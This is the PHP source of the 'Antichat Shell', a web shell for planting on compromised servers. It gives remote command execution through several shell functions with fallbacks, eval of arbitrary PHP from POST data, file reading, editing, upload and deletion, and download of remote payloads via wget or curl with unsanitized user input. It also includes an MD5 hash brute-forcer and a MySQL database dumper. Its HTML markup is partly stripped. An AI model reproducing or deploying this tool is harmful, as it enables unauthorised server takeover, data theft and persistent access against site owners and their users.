$v) { $_POST[$k] = stripslashes($v); } } @ini_set('max_execution_time',0); if(@ini_get('safe_mode') == '1') { $safe_mode="ON"; } else { $safe_mode="OFF"; } if(@ini_get('disable_functions') != "") { $disfunc = ini_get('disable_functions'); } else { $disfunc = 0; } if(strtoupper(substr(PHP_OS, 0, 3))==='WIN') { $os = 1; } else { $os = 0; } $action = $_POST['action']; $file = $_POST['file']; $dir = $_POST['dir']; $content = ''; $stdata = ''; $style = ''; $header = ''.getenv("HTTP_HOST").' - Antichat Shell'.$style.''; $footer = ''; $lang = array( 'filext'=>'File already exists.', 'uploadok'=>'File was successfully uploaded.', 'dircrt'=>'Dir is created.', 'dontlist'=>'Listing dir permission denide.', 'dircrterr'=>'Don\'t create dir.', 'dirnf'=>'Dir not found.', 'filenf'=>'File not found.', 'dontwrdir'=>'Only read current dir.', 'empty'=>'Directory not empty or access denide.', 'deletefileok'=>'File deleted.', 'deletedirok'=>'Dir deleted.', 'isdontfile'=>'Selected file this is link.', 'cantrfile'=>'Cant read file, permission denide.', 'onlyracc'=>'Don\'t edit, only read access.', 'workdir'=>'Work directory: ', 'fullacc'=>'Full access.', 'fullaccdir'=>'Full accees you are can create and delete dir.', 'thisnodir'=>'This is don\'t dir.', 'allfuncsh'=>'All function for work shell was disabled.' ); $act = array('viewer','editor','upload','shell','phpeval','download','delete','deletedir','brute','mysql');//here added new actions function test_file($file){ if(!file_exists($file))$err="1"; elseif(!is_file($file)) $err="2"; elseif(!is_readable($file))$err="3"; elseif(!is_writable($file)) { $err="4"; } else { $err="5"; } return $err; } function test_dir($dir){ if(!file_exists($dir))$err="1"; elseif(!is_dir($dir)) $err="2"; elseif(!is_readable($dir))$err="3"; elseif(!is_writable($dir)) { $err="4"; } else { $err="5"; } return $err; } function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif(($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif(($perms & 0x8000) == 0x8000) { $info = '-'; } elseif(($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif(($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif(($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif(($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); return $info;} function view_size($size){ if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size;} if(isset($action)) { if(!in_array($action,$act)) { $action = "viewer"; } else { $action = $action; } } else { $action = "viewer"; } if(isset($dir)){ $ts['test'] = test_dir($dir); switch($ts['test']){ case 1: $stdata.=$lang['dirnf']; break; case 2: $stdata.=$lang['thisnodir']; break; case 3: $stdata.=$lang['dontlist']; break; case 4: $stdata.=$lang['dontwrdir']; $dir=chdir($GLOBALS['dir']); break; case 5: $stdata.=$lang['fullaccdir']; $dir=chdir($GLOBALS['dir']); break; } } else { $dir=@chdir($dir); } $dir = getcwd()."/"; $dir = str_replace("\\","/",$dir); if(isset($file)){ $ts['test1'] = test_file($file); switch ($ts['test1']){ case 1: $stdata .=$lang['filenf']; break; case 2: $stdata .=$lang['isdontfile']; break; case 3: $stdata .=$lang['cantrfile']; break; case 4: $stdata .=$lang['onlyracc']; $file = $file; break; case 5: $stdata .=$lang['fullacc']; $file = $file; break; } } function shell($cmd) { global $lang; $ret = ''; if(!empty($cmd)) { if(function_exists('exec')){ @exec($cmd,$ret);$ret = join("\n",$ret); } elseif(function_exists('shell_exec')) { $ret = @shell_exec($cmd); } elseif(function_exists('system')) { @ob_start() ;@system($cmd); $ret = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $ret = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cmd,"r"))) { $ret = ""; while(!@feof($f)) { $ret .= @fread($f,1024); } @pclose($f); } else { $ret=$lang['allfuncsh']; } } return $ret; } function createdir($dir) { mkdir($dir); } //delete file if($action == 'delete') { if(unlink($file)) $content.=$lang['deletefileok']." Click here for back in viewer"; } //delete dir if($action == 'deletedir') { if(!rmdir($file)) { $content .=$lang['empty']." Click here for back in viewer"; } else { $content .=$lang['deletedirok']." Click here for back in viewer"; } } //shell if($action == 'shell'){ $content .="


"; } //editor if($action == 'editor'){ $stdata.="
Open file:>\">
"; function writef($file,$data){ $fp = fopen($file, "w+"); fwrite($fp, $data); fclose($fp); } function readf($file){ clearstatcache(); $f = fopen($file, "r"); $contents = fread($f,filesize($file)); fclose($f); return htmlspecialchars($contents); } if(@$_POST['save']) writef($file, $_POST['data']); if(@$_POST['create']) writef($file,""); $test = test_file($file); if($test ==1 ){ $content.="
File name:
"; } if($test > 2){ $content.="

"; } } //viewer if($action == 'viewer'){ $content.=""; $content.=""; } $content .=""; for($i = 0;$i < count($dire);$i++) { $link = $dir.$dire[$i]; $content .=''; } for($i = 0;$i < count($files);$i++) { $linkfile = $dir.$files[$i]; $content .=''; } $content .="

Open directory: >\">
"; if (is_dir($dir)) { if (@$dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if(filetype($dir . $file) == 'dir') $dire[] = $file; if(filetype($dir . $file) == 'file') $files[] = $file; } closedir($dh); @sort($dire); @sort($files); if ($GLOBALS['os'] == 1) { $content.="
Select drive:"; for ($j = ord('C'); $j <= ord('Z'); $j++) if (@$dh = opendir(chr($j).":/")) $content .=' '.chr($j).''; $content .="
Name dirs and filestypesizepermissionoptions
'.$dire[$i].' dir'.perms($link).'X
'.$files[$i].'
 file'.view_size(filesize($linkfile)).''.perms($linkfile).'D EX
"; } } } //downloader if($action == 'download') { header('Content-Length:'.filesize($file).''); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$file.'"'); readfile($file); } //phpeval if($action == 'phpeval') { $content.="
<?php

?>
"; if(isset($_POST['phpev'])) $content .=eval($_POST['phpev']); } //upload if($action == 'upload') { if(isset($_POST['dirupload'])) { $dirupload = $_POST['dirupload']; } else { $dirupload = $dir; } $form_win = ""; if($os == 1) $content.=$form_win; if($os == 0){ $content .=$form_win; $content .=''; } if(isset($_POST['uploadloc'])) { if(!isset($_POST['filename'])) { $uploadfile = $dirupload.basename($_FILES['file']['name']); } else { $uploadfile = $dirupload."/".$_POST['filename']; } if(test_dir($dirupload) == 1 && test_dir($dir) != 3 && test_dir($dir) != 4) { createdir($dirupload); } if(file_exists($uploadfile))$content .= $lang['filext']; elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) $content .=$lang['uploadok']; } if(isset($_POST['upload'])){ if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename'])) switch($_POST['with']) { case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break; case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break; case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break; case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break; case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break; }}} //Brute if($action == 'brute'){ function Brute() { global $action,$pass_de,$chars_de,$dat,$date; ignore_user_abort(1); } if($chars_de == "") { $chars_de =""; } $content ="
Upload to dir:
New file name:
File addres:
"; if($_POST['pass_de']) { $pass_de = htmlspecialchars($pass_de); $pass_de = stripslashes($pass_de); $dat = date("H:i:s"); $date = date("d:m:Y"); } { crack_md5(); } } function crack_md5() { global $chars_de; $chars = $_POST[chars]; ignore_user_abort(1); $chars_de = str_replace("<",chr(60),$chars_de); $chars_de = str_replace(">",chr(62),$chars_de); $c = strlen($chars_de); for($next = 0; $next <= 31; $next++) { for($i1 = 0; $i1 <= $c; $i1++) { $word[1] = $chars_de{$i1}; for($i2 = 0; $i2 <= $c; $i2++) { $word[2] = $chars_de{$i2}; if($next <= 2) { result(implode($word)); } else { for ($i3 = 0; $i3 <= $c; $i3++) { $word[3] = $chars_de{$i3}; if ($next <= 3) { result(implode($word)); }else { for($i4 = 0; $i4 <= $c; $i4++) { $word[4] = $chars_de{$i4}; if($next <= 4) { result(implode($word)); }else { for ($i5 = 0; $i5 <= $c; $i5++) { $word[5] = $chars_de{$i5}; if ($next <= 5) { result(implode($word)); }else { for ($i6 = 0; $i6 <= $c; $i6++) { $word[6] = $chars_de{$i6}; if ($next <= 6) { result(implode($word)); }else { for ($i7 = 0; $i7 <= $c; $i7++) { $word[7] = $chars_de{$i7}; if ($next <= 7) { result(implode($word)); }else { for ($i8 = 0; $i8 <= $c; $i8++) { $word[8] = $chars_de{$i8}; if ($next <= 8) { result(implode($word)); }else { for ($i9 = 0; $i9 <= $c; $i9++) { $word[9] = $chars_de{$i9}; if ($next <= 9) { result(implode($word)); }else { for ($i10 = 0; $i10 <= $c; $i10++) { $word[10] = $chars_de{$i10}; if ($next <= 10) { result(implode($word)); }else { for ($i11 = 0; $i11 <= $c; $i11++) { $word[11] = $chars_de{$i11}; if ($next <= 11) { result(implode($word)); }else { for ($i12 = 0; $i12 <= $c; $i12++) { $word[12] = $chars_de{$i12}; if ($next <= 12) { result(implode($word)); }else { for ($i13 = 0; $i13 <= $c; $i13++) { $word[13] = $chars_de{$i13}; if ($next <= 13) { result(implode($word)); }else { for ($i14 = 0; $i14 <= $c; $i14++) { $word[14] = $chars_de{$i14}; if ($next <= 14) { result(implode($word)); }else { for ($i15 = 0; $i15 <= $c; $i15++) { $word[15] = $chars_de{$i15}; if ($next <= 15) { result(implode($word)); }else { for ($i16 = 0; $i16 <= $c; $i16++) { $word[16] = $chars_de{$i16}; if ($next <= 16) { result(implode($word)); }else { for ($i17 = 0; $i17 <= $c; $i17++) { $word[17] = $chars_de{$i17}; if ($next <= 17) { result(implode($word)); }else { for ($i18 = 0; $i18 <= $c; $i18++) { $word[18] = $chars_de{$i18}; if ($next <= 18) { result(implode($word)); }else { for ($i19 = 0; $i19 <= $c; $i19++) { $word[19] = $chars_de{$i19}; if ($next <= 19) { result(implode($word)); }else { for ($i20 = 0; $i20 <= $c; $i20++) { $word[20] = $chars_de{$i20}; if ($next <= 20) { result(implode($word)); }else { for ($i21 = 0; $i21 <= $c; $i21++) { $word[21] = $chars_de{$i21}; if ($next <= 21) { result(implode($word)); }else { for ($i22 = 0; $i22 <= $c; $i22++) { $word[22] = $chars_de{$i22}; if ($next <= 22) { result(implode($word)); }else { for ($i23 = 0; $i23 <= $c; $i23++) { $word[23] = $chars_de{$i23}; if ($next <= 23) { result(implode($word)); }else { for ($i24 = 0; $i24 <= $c; $i24++) { $word[24] = $chars_de{$i24}; if ($next <= 24) { result(implode($word)); }else { for ($i25 = 0; $i25 <= $c; $i25++) { $word[25] = $chars_de{$i25}; if ($next <= 25) { result(implode($word)); }else { for ($i26 = 0; $i26 <= $c; $i26++) { $word[26] = $chars_de{$i26}; if ($next <= 26) { result(implode($word)); }else { for ($i27 = 0; $i27 <= $c; $i27++) { $word[27] = $chars_de{$i27}; if ($next <= 27) { result(implode($word)); }else { for ($i28 = 0; $i28 <= $c; $i28++) { $word[28] = $chars_de{$i28}; if ($next <= 28) { result(implode($word)); }else { for ($i29 = 0; $i29 <= $c; $i29++) { $word[29] = $chars_de{$i29}; if ($next <= 29) { result(implode($word)); }else { for ($i30 = 0; $i30 <= $c; $i30++) { $word[30] = $chars_de{$i30}; if ($next <= 30) { result(implode($word)); }else { for ($i31 = 0; $i31 <= $c; $i31++) { $word[31] = $chars_de{$i31}; if ($next <= 31) { result(implode($word)); }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} function result($word) { global $dat,$date; $pass_de = $_POST[pass_de]; $dat2 = date("H:i:s"); $date2 = date("d:m:Y"); if(md5($word) == $pass_de){ echo "
Decrypte MD5
 MD5 хеш:".$pass_de."
  Перебор букв:
ENG: [a-z] [A-Z]
[0-9] [Символы]

RUS: [а-я] [А-Я]

 
Результат выполнения перебора паролей:
Захешированный пароль:  $word
Начало перебора:  $dat - $date
Окончание перебора:  $dat2 - $date2
Выполнение перебора хешей записан в файл: ".$word."_md5
"; $f = @fopen($word._md5,"a+"); fputs($f,"Хэш из MD5 [$pass_de] = $word Начало перебора:\t$dat - $date Окончание перебора:\t$dat2 - $date2"); exit; }} //Mysql if($action == 'mysql') { if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } if((!empty($_POST['dif']) && $fp) || (empty($_POST['dif']))) { $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(@mysql_select_db($_POST['mysql_db'],$db)) { $sql1 .= "# ---------------------------------\r\n"; $sql1 .= "# date : ".date ("j F Y g:i")."\r\n"; $sql1 .= "# database : ".$_POST['mysql_db']."\r\n"; $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); $row = @mysql_fetch_row($res); $sql1 .= $row[1]."\r\n\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; $sql2 = ''; $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); if (@mysql_num_rows($res) > 0) { while ($row = @mysql_fetch_assoc($res)) { $keys = @implode("`, `", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = @implode("', '", $values); $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n"; } $sql2 .= "\r\n# ---------------------------------"; } $content .="
Готово! Дамп прошел удачно!
"; if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } else { echo $sql1.$sql2; } } // end if(@mysql_select_db($_POST['mysql_db'],$db)) else $content.="
Такой БД нет!
"; @mysql_close($db); } } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){ else if(!empty($_POST['dif'])&&!$fp) { $content.="
ОШИБКА, нет прав записи в файл!
"; } $content.="
 База:
 Сохранить дамп в файле: $str[0]"; @$tc++; } $content .="
"; @$base = $_POST['base']; @$db = $_POST['db']; $content .="

[Всего таблиц: $tc]"; if($base){ $content .="

Таблица: [$tbl]
"; $result = mysql_list_tables($db); while($str=mysql_fetch_array($result)){ $c = mysql_query ("SELECT COUNT(*) FROM $str[0]"); $records = mysql_fetch_array($c); $content .="[$records[0]]$str[0]
"; mysql_free_result($c); }} $content .="
"; @$vn = $_POST['vn']; $content .= "База данных: $db => $vn
"; @$inside = $_POST['inside']; @$tbl = $_POST['tbl']; if($inside){ $content .= ""; mysql_select_db($db) or die(mysql_error()); $c = mysql_query ("SELECT COUNT(*) FROM $tbl"); $cfa = mysql_fetch_array($c); mysql_free_result($c); $content .= "Всего: $cfa[0] От: До: "; @$vn = $_POST['vn']; @$from = $_POST['from']; @$to = $_POST['to']; @$from = $_POST['from']; @$to = $_POST['to']; if(!isset($from)){ $from=0; } if(!isset($to)){ $to=50; } $query = "SELECT * FROM $vn LIMIT $from,$to"; $result = mysql_query($query); for ($i=0;$i$lee) { $nst_inside = htmlspecialchars($lee); $content .= "\r\n"; } } mysql_free_result($result); $content .= "
 $nst_inside
"; }}} //end function ?>
.| Shell |. .| Viewer |. .| Editor |. .| Upload |. .| Brute |. .| Mysql Dumper|. .| Php Eval |. .| <-back |..| forward->|.

Safe mode:
Disable functions:
OS:
Server:
Id:

Status:

| Copyright by Antichat.ru | Made by Grinay | Modified by Go0o$E
Last update by Isis |